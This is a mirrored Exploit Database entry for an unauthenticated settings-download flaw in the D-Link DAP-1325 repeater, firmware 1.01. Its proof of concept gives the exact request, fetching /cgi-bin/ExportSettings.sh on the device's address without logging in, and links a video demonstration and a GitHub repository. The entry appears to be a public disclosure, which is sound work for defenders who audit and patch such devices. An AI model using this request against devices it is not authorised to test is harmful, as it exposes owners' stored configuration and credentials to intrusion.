D-Link DAP-1325 – Broken Access Control

• Exploit Database
• 20 阅读

• 作者： ieduardogoncalves
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51556/

• # Exploit Title: D-Link DAP-1325 - Broken Access Control
  # Date: 27-06-2023
  # Exploit Author: ieduardogoncalves
  # Contact : twitter.com/0x00dia
  # Vendor : www.dlink.com
  # Version: Hardware version: A1 
  # Firmware version: 1.01
  # Tested on:All Platforms
  
  
  1) Description
  
  Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
  
  
  IN MY CASE,
  Tested repeater IP: http://192.168.0.21/
  
  Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
  
  2) Proof of Concept
  
  Step 1: Go to
  Repeater Login Page : http://192.168.0.21/
  
  Step 2:
  Add the payload to URL.
  
  Payload:
  http://{ip}/cgi-bin/ExportSettings.sh
  
  Payload:
  https://github.com/eeduardogoncalves/exploit